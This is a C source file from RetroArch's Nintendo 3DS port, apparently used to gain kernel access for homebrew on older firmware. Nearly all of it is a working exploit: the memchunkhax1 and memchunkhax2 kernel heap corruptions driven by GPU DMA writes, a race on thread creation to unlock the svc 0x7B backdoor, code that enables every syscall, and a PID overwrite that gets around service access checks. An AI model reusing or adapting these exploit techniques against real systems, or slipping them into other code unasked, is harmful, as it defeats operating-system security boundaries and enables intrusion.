RetroArch/ctr/ctr_svchax.c
Justin Weiss 9ae2514009 [3DS] Update to libctru 2.0
Set USE_CTRULIB_2=1 to build with libctru 2.0. When unset, this code
is compatible with the older toolchain.

Some 2.0 changes addressed rare problems in earlier versions:

- Save / restore stack pointer for init / exit
  Otherwise, it could be outside of the range we deallocate.
- Run aptMainLoop in the audio driver to react correctly to sleep events

Other changes for 2.0:

- Remove ninjhax1 -- requires outdated APIs that have been removed
- Switch from __sync_arbiter to syncArbitrateAddress
- Use implicit gxCmdBuf
- Use gpuPresentBuffer for double buffering
2020-08-26 19:08:12 -07:00

573 lines
16 KiB
C

#include <3ds.h>
#include <stdio.h>
#include <string.h>
#include <malloc.h>
#define CURRENT_KTHREAD 0xFFFF9000
#define CURRENT_KPROCESS 0xFFFF9004
#define CURRENT_KPROCESS_HANDLE 0xFFFF8001
#define RESOURCE_LIMIT_THREADS 0x2
#define MCH2_THREAD_COUNT_MAX 0x20
#define MCH2_THREAD_STACKS_SIZE 0x1000
#define SVC_ACL_OFFSET(svc_id) (((svc_id) >> 5) << 2)
#define SVC_ACL_MASK(svc_id) (0x1 << ((svc_id) & 0x1F))
#define THREAD_PAGE_ACL_OFFSET 0xF38
u32 __ctr_svchax = 0;
u32 __ctr_svchax_srv = 0;
extern void* __service_ptr;
typedef u32(*backdoor_fn)(u32 arg0, u32 arg1);
typedef struct
{
Handle started_event;
Handle lock;
volatile u32 target_kaddr;
volatile u32 target_val;
} mch2_thread_args_t;
typedef struct
{
u32* stack_top;
Handle handle;
bool keep;
mch2_thread_args_t args;
} mch2_thread_t;
typedef struct
{
u32 old_cpu_time_limit;
bool isNew3DS;
u32 kernel_fcram_mapping_offset;
#ifndef USE_CTRULIB_2
Handle arbiter;
#endif
volatile u32 alloc_address;
volatile u32 alloc_size;
u8* flush_buffer;
Handle dummy_threads_lock;
Handle target_threads_lock;
Handle main_thread_lock;
u32* thread_page_va;
u32 thread_page_kva;
u32 threads_limit;
Handle alloc_thread;
Handle poll_thread;
mch2_thread_t threads[MCH2_THREAD_COUNT_MAX];
} mch2_vars_t;
__attribute((naked))
static u32 svc_7b(backdoor_fn entry_fn, ...) /* can pass up to two arguments to entry_fn(...) */
{
__asm__ volatile(
"push {r0, r1, r2} \n\t"
"mov r3, sp \n\t"
"add r0, pc, #12 \n\t"
"svc 0x7B \n\t"
"add sp, sp, #8 \n\t"
"ldr r0, [sp], #4 \n\t"
"bx lr \n\t"
"cpsid aif \n\t"
"ldr r2, [r3], #4 \n\t"
"ldmfd r3!, {r0, r1} \n\t"
"push {r3, lr} \n\t"
"blx r2 \n\t"
"pop {r3, lr} \n\t"
"str r0, [r3, #-4]! \n\t"
"bx lr \n\t");
return 0;
}
static void k_enable_all_svcs(u32 isNew3DS)
{
u32* thread_ACL = *(*(u32***)CURRENT_KTHREAD + 0x22) - 0x6;
u32* process_ACL = *(u32**)CURRENT_KPROCESS + (isNew3DS ? 0x24 : 0x22);
memset(thread_ACL, 0xFF, 0x10);
memset(process_ACL, 0xFF, 0x10);
}
static u32 k_read_kaddr(u32* kaddr)
{
return *kaddr;
}
static u32 read_kaddr(u32 kaddr)
{
return svc_7b((backdoor_fn)k_read_kaddr, kaddr);
}
static u32 k_write_kaddr(u32* kaddr, u32 val)
{
*kaddr = val;
return 0;
}
static void write_kaddr(u32 kaddr, u32 val)
{
svc_7b((backdoor_fn)k_write_kaddr, kaddr, val);
}
__attribute__((naked))
static u32 get_thread_page(void)
{
__asm__ volatile(
"sub r0, sp, #8 \n\t"
"mov r1, #1 \n\t"
"mov r2, #0 \n\t"
"svc 0x2A \n\t"
"mov r0, r1, LSR#12 \n\t"
"mov r0, r0, LSL#12 \n\t"
"bx lr \n\t");
return 0;
}
static void alloc_thread_entry(mch2_vars_t* mch2)
{
u32 tmp;
svcControlMemory(&tmp, mch2->alloc_address, 0x0, mch2->alloc_size, MEMOP_ALLOC, MEMPERM_READ | MEMPERM_WRITE);
svcExitThread();
}
static void dummy_thread_entry(Handle lock)
{
svcWaitSynchronization(lock, U64_MAX);
svcExitThread();
}
static void check_tls_thread_entry(bool* keep)
{
*keep = !((u32)getThreadLocalStorage() & 0xFFF);
svcExitThread();
}
static void target_thread_entry(mch2_thread_args_t* args)
{
svcSignalEvent(args->started_event);
svcWaitSynchronization(args->lock, U64_MAX);
if (args->target_kaddr)
write_kaddr(args->target_kaddr, args->target_val);
svcExitThread();
}
static u32 get_first_free_basemem_page(bool isNew3DS)
{
s64 v1;
int memused_base_linear; /* guessed */
int memused_base = osGetMemRegionUsed(MEMREGION_BASE);
svcGetSystemInfo(&v1, 2, 0);
memused_base_linear = 0x6C000 + v1 +
(osGetKernelVersion() > SYSTEM_VERSION(2, 49, 0) ? (isNew3DS ? 0x2000 : 0x1000) : 0x0);
return (osGetKernelVersion() > SYSTEM_VERSION(2, 40, 0) ? 0xE0000000 : 0xF0000000) /* kernel FCRAM mapping */
+ (isNew3DS ? 0x10000000 : 0x08000000) /* FCRAM size */
- (memused_base - memused_base_linear) /* memory usage for pages allocated without the MEMOP_LINEAR flag */
- 0x1000; /* skip to the start addr of the next free page */
}
static u32 get_threads_limit(void)
{
Handle resource_limit_handle;
s64 thread_limit_current;
s64 thread_limit_max;
u32 thread_limit_name = RESOURCE_LIMIT_THREADS;
svcGetResourceLimit(&resource_limit_handle, CURRENT_KPROCESS_HANDLE);
svcGetResourceLimitCurrentValues(&thread_limit_current, resource_limit_handle, &thread_limit_name, 1);
svcGetResourceLimitLimitValues(&thread_limit_max, resource_limit_handle, &thread_limit_name, 1);
svcCloseHandle(resource_limit_handle);
if (thread_limit_max > MCH2_THREAD_COUNT_MAX)
thread_limit_max = MCH2_THREAD_COUNT_MAX;
return thread_limit_max - thread_limit_current;
}
static void do_memchunkhax2(void)
{
static u8 flush_buffer[0x8000];
static u8 thread_stacks[MCH2_THREAD_STACKS_SIZE];
extern u32 __heapBase;
extern u32 __heap_size;
int i;
u32 tmp;
u32 linear_buffer;
u32 linear_address;
u32 dst_memchunk;
u32 mem_free;
u32 fragmented_size;
u32* mapped_page;
volatile u32 *thread_ACL;
u32 alloc_address_kaddr;
u32 fragmented_address = 0;
u32 linear_size = 0xF000;
u32 skip_pages = 2;
mch2_vars_t mch2 = {0};
mch2.flush_buffer = flush_buffer;
mch2.threads_limit = get_threads_limit();
mch2.kernel_fcram_mapping_offset = (osGetKernelVersion() > SYSTEM_VERSION(2, 40, 0)) ? 0xC0000000 : 0xD0000000;
for (i = 0; i < MCH2_THREAD_COUNT_MAX; i++)
mch2.threads[i].stack_top = (u32*)((u32)thread_stacks + (i + 1) * (MCH2_THREAD_STACKS_SIZE / MCH2_THREAD_COUNT_MAX));
APT_CheckNew3DS(&mch2.isNew3DS);
APT_GetAppCpuTimeLimit(&mch2.old_cpu_time_limit);
APT_SetAppCpuTimeLimit(5);
for (i = 0; i < mch2.threads_limit; i++)
{
svcCreateThread(&mch2.threads[i].handle,
(ThreadFunc)check_tls_thread_entry,
(u32)&mch2.threads[i].keep,
mch2.threads[i].stack_top, 0x18, 0);
svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
}
for (i = 0; i < mch2.threads_limit; i++)
if (!mch2.threads[i].keep)
svcCloseHandle(mch2.threads[i].handle);
svcCreateEvent(&mch2.dummy_threads_lock, 1);
svcClearEvent(mch2.dummy_threads_lock);
for (i = 0; i < mch2.threads_limit; i++)
if (!mch2.threads[i].keep)
svcCreateThread(&mch2.threads[i].handle,
(ThreadFunc)dummy_thread_entry,
mch2.dummy_threads_lock,
mch2.threads[i].stack_top, 0x3F - i, 0);
svcSignalEvent(mch2.dummy_threads_lock);
for (i = mch2.threads_limit - 1; i >= 0; i--)
{
if (!mch2.threads[i].keep)
{
svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
svcCloseHandle(mch2.threads[i].handle);
mch2.threads[i].handle = 0;
}
}
svcCloseHandle(mch2.dummy_threads_lock);
#ifndef USE_CTRULIB_2
mch2.arbiter = __sync_get_arbiter();
#endif
svcControlMemory(&linear_buffer, 0, 0, 0x1000,
MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);
mch2.alloc_size = ((((linear_size - (skip_pages << 12))
+ 0x1000) >> 13) << 12);
mem_free = osGetMemRegionFree(MEMREGION_APPLICATION);
fragmented_size = mem_free - linear_size;
fragmented_address = __heapBase + __heap_size;
mch2.alloc_address = fragmented_address + fragmented_size;
svcControlMemory(&linear_address,
0x0, 0x0, linear_size, MEMOP_ALLOC_LINEAR,
MEMPERM_READ | MEMPERM_WRITE);
if (fragmented_size)
svcControlMemory(&tmp,
(u32)fragmented_address, 0x0, fragmented_size, MEMOP_ALLOC,
MEMPERM_READ | MEMPERM_WRITE);
if (skip_pages)
svcControlMemory(&tmp,
(u32)linear_address, 0x0, (skip_pages << 12), MEMOP_FREE,
MEMPERM_DONTCARE);
for (i = skip_pages; i < (linear_size >> 12) ; i += 2)
svcControlMemory(&tmp,
(u32)linear_address + (i << 12), 0x0, 0x1000,
MEMOP_FREE, MEMPERM_DONTCARE);
alloc_address_kaddr = osConvertVirtToPhys(
(void*)linear_address) + mch2.kernel_fcram_mapping_offset;
mch2.thread_page_kva = get_first_free_basemem_page(mch2.isNew3DS)
- 0x10000; /* skip down 16 pages */
((u32*)linear_buffer)[0] = 1;
((u32*)linear_buffer)[1] = mch2.thread_page_kva;
((u32*)linear_buffer)[2] = alloc_address_kaddr + (((mch2.alloc_size >> 12) - 3) << 13) + (skip_pages << 12);
dst_memchunk = linear_address
+ (((mch2.alloc_size >> 12) - 2) << 13)
+ (skip_pages << 12);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
GSPGPU_InvalidateDataCache((void*)dst_memchunk, 16);
GSPGPU_FlushDataCache((void*)linear_buffer, 16);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
/* can't clear gspEvents[GSPGPU_EVENT_PPF]),
* directly so execute a dummy copy
* and use gspWaitForEvent to clear it. */
/* LightEvent_Clear(&gspEvents[GSPGPU_EVENT_PPF]); */
GX_TextureCopy((void*)linear_buffer, 0, (void*)dst_memchunk, 0, 16, 8);
gspWaitForEvent(GSPGPU_EVENT_PPF, false);
svcCreateThread(&mch2.alloc_thread,
(ThreadFunc)alloc_thread_entry, (u32)&mch2,
mch2.threads[MCH2_THREAD_COUNT_MAX - 1].stack_top, 0x3F, 1);
#ifdef USE_CTRULIB_2
while ((u32) syncArbitrateAddress((s32 *)mch2.alloc_address,
ARBITRATION_WAIT_IF_LESS_THAN_TIMEOUT, 0) == 0xD9001814);
#else
while ((u32) svcArbitrateAddress(mch2.arbiter, mch2.alloc_address,
ARBITRATION_WAIT_IF_LESS_THAN_TIMEOUT, 0,
0) == 0xD9001814);
#endif
GX_TextureCopy((void*)linear_buffer, 0, (void*)dst_memchunk, 0, 16, 8);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
gspWaitForEvent(GSPGPU_EVENT_PPF, false);
svcWaitSynchronization(mch2.alloc_thread, U64_MAX);
svcCloseHandle(mch2.alloc_thread);
mapped_page = (u32*)
(mch2.alloc_address + mch2.alloc_size - 0x1000);
thread_ACL = &mapped_page[THREAD_PAGE_ACL_OFFSET >> 2];
svcCreateEvent(&mch2.main_thread_lock, 0);
svcCreateEvent(&mch2.target_threads_lock, 1);
svcClearEvent(mch2.target_threads_lock);
for (i = 0; i < mch2.threads_limit; i++)
{
if (mch2.threads[i].keep)
continue;
mch2.threads[i].args.started_event = mch2.main_thread_lock;
mch2.threads[i].args.lock = mch2.target_threads_lock;
mch2.threads[i].args.target_kaddr = 0;
thread_ACL[0] = 0;
GSPGPU_FlushDataCache((void*)thread_ACL, 16);
GSPGPU_InvalidateDataCache((void*)thread_ACL, 16);
svcClearEvent(mch2.main_thread_lock);
svcCreateThread(&mch2.threads[i].handle,
(ThreadFunc)target_thread_entry,
(u32)&mch2.threads[i].args,
mch2.threads[i].stack_top, 0x18, 0);
svcWaitSynchronization(mch2.main_thread_lock, U64_MAX);
if (thread_ACL[0])
{
thread_ACL[SVC_ACL_OFFSET(0x7B) >> 2] = SVC_ACL_MASK(0x7B);
GSPGPU_FlushDataCache((void*)thread_ACL, 16);
GSPGPU_InvalidateDataCache((void*)thread_ACL, 16);
mch2.threads[i].args.target_kaddr = get_thread_page()
+ THREAD_PAGE_ACL_OFFSET
+ SVC_ACL_OFFSET(0x7B);
mch2.threads[i].args.target_val = SVC_ACL_MASK(0x7B);
break;
}
}
svcSignalEvent(mch2.target_threads_lock);
for (i = 0; i < mch2.threads_limit; i++)
{
if (!mch2.threads[i].handle)
continue;
if (!mch2.threads[i].keep)
svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
svcCloseHandle(mch2.threads[i].handle);
}
svcCloseHandle(mch2.target_threads_lock);
svcCloseHandle(mch2.main_thread_lock);
svcControlMemory(&tmp, mch2.alloc_address, 0, mch2.alloc_size,
MEMOP_FREE, MEMPERM_DONTCARE);
write_kaddr(alloc_address_kaddr + linear_size - 0x3000 + 0x4, alloc_address_kaddr + linear_size - 0x1000);
svcControlMemory(&tmp, (u32)fragmented_address, 0x0, fragmented_size,
MEMOP_FREE, MEMPERM_DONTCARE);
for (i = 1 + skip_pages; i < (linear_size >> 12) ; i += 2)
svcControlMemory(&tmp, (u32)linear_address + (i << 12), 0x0, 0x1000,
MEMOP_FREE, MEMPERM_DONTCARE);
svcControlMemory(&tmp, linear_buffer, 0, 0x1000, MEMOP_FREE,
MEMPERM_DONTCARE);
APT_SetAppCpuTimeLimit(mch2.old_cpu_time_limit);
}
static void gspwn(u32 dst, u32 src, u32 size, u8* flush_buffer)
{
extern Handle gspEvents[GSPGPU_EVENT_MAX];
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
GSPGPU_InvalidateDataCache((void*)dst, size);
GSPGPU_FlushDataCache((void*)src, size);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
GX_TextureCopy((void*)src, 0, (void*)dst, 0, size, 8);
gspWaitForEvent(GSPGPU_EVENT_PPF, false);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
}
/* pseudo-code:
* if(val2)
* {
* *(u32*)val1 = val2;
* *(u32*)(val2 + 8) = (val1 - 4);
* }
* else
* *(u32*)val1 = 0x0;
*/
/* X-X--X-X
* X-XXXX-X
*/
static void memchunkhax1_write_pair(u32 val1, u32 val2)
{
u32 linear_buffer;
u8* flush_buffer;
u32 tmp;
u32* next_ptr3;
u32* prev_ptr3;
u32* next_ptr1;
u32* prev_ptr6;
svcControlMemory(&linear_buffer, 0, 0, 0x10000,
MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);
flush_buffer = (u8*)(linear_buffer + 0x8000);
svcControlMemory(&tmp, linear_buffer + 0x1000, 0, 0x1000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x3000, 0, 0x2000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x6000, 0, 0x1000, MEMOP_FREE, 0);
next_ptr1 = (u32*)(linear_buffer + 0x0004);
gspwn(linear_buffer + 0x0000, linear_buffer + 0x1000, 16, flush_buffer);
next_ptr3 = (u32*)(linear_buffer + 0x2004);
prev_ptr3 = (u32*)(linear_buffer + 0x2008);
gspwn(linear_buffer + 0x2000, linear_buffer + 0x3000, 16, flush_buffer);
prev_ptr6 = (u32*)(linear_buffer + 0x5008);
gspwn(linear_buffer + 0x5000, linear_buffer + 0x6000, 16, flush_buffer);
*next_ptr1 = *next_ptr3;
*prev_ptr6 = *prev_ptr3;
*prev_ptr3 = val1 - 4;
*next_ptr3 = val2;
gspwn(linear_buffer + 0x3000, linear_buffer + 0x2000, 16, flush_buffer);
svcControlMemory(&tmp, 0, 0, 0x2000,
MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);
gspwn(linear_buffer + 0x1000, linear_buffer + 0x0000, 16, flush_buffer);
gspwn(linear_buffer + 0x6000, linear_buffer + 0x5000, 16, flush_buffer);
svcControlMemory(&tmp, linear_buffer + 0x0000, 0, 0x1000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x2000, 0, 0x4000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x7000, 0, 0x9000, MEMOP_FREE, 0);
}
static void do_memchunkhax1(void)
{
u32 saved_vram_value = *(u32*)0x1F000008;
/* 0x1F000000 contains the enable bit for svc 0x7B */
memchunkhax1_write_pair(get_thread_page()
+ THREAD_PAGE_ACL_OFFSET
+ SVC_ACL_OFFSET(0x7B), 0x1F000000);
write_kaddr(0x1F000008, saved_vram_value);
}
Result get_luma_version(u32 *major, u32 *minor)
{
s64 out;
u32 version;
if (R_FAILED(svcGetSystemInfo(&out, 0x10000, 0)))
return -1;
version = (u32)out;
*major = GET_VERSION_MAJOR(version);
*minor = GET_VERSION_MINOR(version);
return 0;
}
Result svchax_init(bool patch_srv)
{
bool isNew3DS;
u32 kver;
APT_CheckNew3DS(&isNew3DS);
kver = osGetKernelVersion();
if (!__ctr_svchax)
{
if (__service_ptr)
{
u32 luma_major, luma_minor;
if (kver > SYSTEM_VERSION(2, 50, 11) &&
(R_FAILED(get_luma_version(&luma_major, &luma_minor)
|| luma_major < 8)))
return -1;
else if (kver > SYSTEM_VERSION(2, 46, 0)
&& kver <= SYSTEM_VERSION(2, 50, 11))
do_memchunkhax2();
else if (kver <= SYSTEM_VERSION(2, 46, 0))
do_memchunkhax1();
}
svc_7b((backdoor_fn)k_enable_all_svcs, isNew3DS);
__ctr_svchax = 1;
}
if (patch_srv && !__ctr_svchax_srv)
{
u32 PID_kaddr = read_kaddr(CURRENT_KPROCESS)
+ (isNew3DS ? 0xBC : (kver > SYSTEM_VERSION(2, 40, 0)) ? 0xB4 : 0xAC);
u32 old_PID = read_kaddr(PID_kaddr);
write_kaddr(PID_kaddr, 0);
srvExit();
srvInit();
write_kaddr(PID_kaddr, old_PID);
__ctr_svchax_srv = 1;
}
return 0;
}